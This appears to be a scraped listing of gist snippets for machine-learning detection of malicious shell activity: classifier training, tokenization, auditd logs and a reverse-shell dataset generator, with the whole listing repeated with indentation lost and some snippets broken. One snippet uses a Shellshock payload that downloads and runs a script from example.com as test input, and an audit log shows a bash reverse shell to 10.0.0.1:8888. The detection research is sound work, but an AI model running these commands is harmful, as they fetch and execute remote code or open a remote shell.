Dmitrijs Trizna dtrizna

## hash_normalization.py
def normalizeStringHash(string):
    string = re.sub(r'[0-9a-fA-F]{64}', "<sha256>", string)
    string = re.sub(r'[0-9a-fA-F]{40}', "<sha1>", string)
    string = re.sub(r'[0-9a-fA-F]{32}', "<md5>", string)
    return string

## gradient_accumulation.py
model.zero_grad()                                   # Reset gradients tensors
for i, (inputs, labels) in enumerate(training_set):
    predictions = model(inputs)                     # Forward pass
    loss = loss_function(predictions, labels)       # Compute loss function
    loss = loss / accumulation_steps                # Normalize our loss (if averaged)
    loss.backward()                                 # Backward pass
    if (i+1) % accumulation_steps == 0:             # Wait for several backward steps
        optimizer.step()                            # Now we can do an optimizer step
        model.zero_grad()                           # Reset gradients tensors
        if (i+1) % evaluation_steps == 0:           # Evaluate the model when we...

## partial_fit_example.py
from sklearn.neural_network import MLPClassifier

X_full_dataset = [...]
y_full_dataset = [...]

mlpModel = MLClassifier(
  hidden_layer_sizes=(128,64)
)
mlpModel.fit(full_dataset, y)

## fixed_fp_rate_analysis.py
from sklearn.metrics import roc_curve, det_curve

def get_threshold_from_rate(thresholds, rate_array, rate):
    index = np.where(rate_array >= rate)[0][0]
    return thresholds[index]

def get_value_from_threshold(values, thresholds, threshold):
    try:
        thr_index = np.where(thresholds <= threshold)[0][0]
    except IndexError:

## xgbclassifier_training.py
from xgboost import XGBClassifier

xgb_model = XGBClassifier(n_estimators=100, use_label_encoder=False, eval_metric="logloss")
xgb_model.fit(
  X["HashingVectorizer"], y
)

shellshock_backdoor = "() { :;}; /bin/bash -c 'curl -O /tmp/foo.sh example.com/test; nohup bash /tmp/foo.sh &'"
print(xgb_model.predict_proba(
  hvwpt.transform([shellshock_backdoor])

## cross_validation_xgbclassifier.py
from sklearn.model_selection import cross_validate
from sklearn.model_selection import StratifiedKFold

def print_scores(cv):
    means = np.mean(list(cv.values()), axis=1)
    [print(f"\tAverage {x[0].strip('test_'):<10} over all folds: {x[1]:.2f}") for x in zip(cv.keys(), means) if "test_" in x[0]]
    print()

cv = {}
metrics = ["accuracy", "precision", "recall", "f1", "roc_auc"]

## auditd_sample.log
type=EXECVE msg=audit(1648469217.476:296): argc=2 a0="readlink" a1="/usr/bin/python"
type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.*=.*ubuntu" a3="/etc/os-release"
type=EXECVE msg=audit(1648469217.512:299): argc=3 a0="tput" a1="setaf" a2="1"
type=EXECVE msg=audit(1648469218.312:300): argc=4 a0="/bin/sh" a1="-c" a3="/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261"
type=EXECVE msg=audit(1648469219.440:302): argc=3 a0="/usr/lib/x86_64-linux-gnu/utempter/utempter" a1="add" a2="tmux(3353).%1"

## slp_tokenization.py
import re
from nltk.tokenize import WordPunctTokenizer
from sklearn.feature_extraction.text import HashingVectorizer

wpt = WordPunctTokenizer()
hvwpt = HashingVectorizer(
    preprocessor=lambda x: re.sub(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", "_IPADDRESS_", x),
    tokenizer=wpt.tokenize,
    token_pattern=None,
    lowercase=False,

## auditd_example.json
{
    "program_name": "auditbeat",
    "hostname": "k8s-minikube",
    "...",
    "auditd": {
        "message_type": "syscall",
        "summary": {
            "actor": {
                "primary": "root",
                "secondary": "root"

## genereate_reverse_shell_dataset.py
import random
import string
import time

def get_random_ip(octets=4):
    return ".".join(map(str, (random.randint(0, 255) for _ in range(octets))))

def get_random_string(length=10):
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(length))
	def normalizeStringHash(string):
	string = re.sub(r'[0-9a-fA-F]{64}', "<sha256>", string)
	string = re.sub(r'[0-9a-fA-F]{40}', "<sha1>", string)
	string = re.sub(r'[0-9a-fA-F]{32}', "<md5>", string)
	return string
	model.zero_grad() # Reset gradients tensors
	for i, (inputs, labels) in enumerate(training_set):
	predictions = model(inputs) # Forward pass
	loss = loss_function(predictions, labels) # Compute loss function
	loss = loss / accumulation_steps # Normalize our loss (if averaged)
	loss.backward() # Backward pass
	if (i+1) % accumulation_steps == 0: # Wait for several backward steps
	optimizer.step() # Now we can do an optimizer step
	model.zero_grad() # Reset gradients tensors
	if (i+1) % evaluation_steps == 0: # Evaluate the model when we...
	from sklearn.neural_network import MLPClassifier

	X_full_dataset = [...]
	y_full_dataset = [...]

	mlpModel = MLClassifier(
	hidden_layer_sizes=(128,64)
	)
	mlpModel.fit(full_dataset, y)
	from sklearn.metrics import roc_curve, det_curve

	def get_threshold_from_rate(thresholds, rate_array, rate):
	index = np.where(rate_array >= rate)[0][0]
	return thresholds[index]

	def get_value_from_threshold(values, thresholds, threshold):
	try:
	thr_index = np.where(thresholds <= threshold)[0][0]
	except IndexError:
	from xgboost import XGBClassifier

	xgb_model = XGBClassifier(n_estimators=100, use_label_encoder=False, eval_metric="logloss")
	xgb_model.fit(
	X["HashingVectorizer"], y
	)

	shellshock_backdoor = "() { :;}; /bin/bash -c 'curl -O /tmp/foo.sh example.com/test; nohup bash /tmp/foo.sh &'"
	print(xgb_model.predict_proba(
	hvwpt.transform([shellshock_backdoor])
	from sklearn.model_selection import cross_validate
	from sklearn.model_selection import StratifiedKFold

	def print_scores(cv):
	means = np.mean(list(cv.values()), axis=1)
	[print(f"\tAverage {x[0].strip('test_'):<10} over all folds: {x[1]:.2f}") for x in zip(cv.keys(), means) if "test_" in x[0]]
	print()

	cv = {}
	metrics = ["accuracy", "precision", "recall", "f1", "roc_auc"]
	type=EXECVE msg=audit(1648469217.476:296): argc=2 a0="readlink" a1="/usr/bin/python"
	type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.=.ubuntu" a3="/etc/os-release"
	type=EXECVE msg=audit(1648469217.512:299): argc=3 a0="tput" a1="setaf" a2="1"
	type=EXECVE msg=audit(1648469218.312:300): argc=4 a0="/bin/sh" a1="-c" a3="/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261"
	type=EXECVE msg=audit(1648469219.440:302): argc=3 a0="/usr/lib/x86_64-linux-gnu/utempter/utempter" a1="add" a2="tmux(3353).%1"
	import re
	from nltk.tokenize import WordPunctTokenizer
	from sklearn.feature_extraction.text import HashingVectorizer

	wpt = WordPunctTokenizer()
	hvwpt = HashingVectorizer(
	preprocessor=lambda x: re.sub(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", "_IPADDRESS_", x),
	tokenizer=wpt.tokenize,
	token_pattern=None,
	lowercase=False,
	{
	"program_name": "auditbeat",
	"hostname": "k8s-minikube",
	"...",
	"auditd": {
	"message_type": "syscall",
	"summary": {
	"actor": {
	"primary": "root",
	"secondary": "root"
	import random
	import string
	import time

	def get_random_ip(octets=4):
	return ".".join(map(str, (random.randint(0, 255) for _ in range(octets))))

	def get_random_string(length=10):
	return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(length))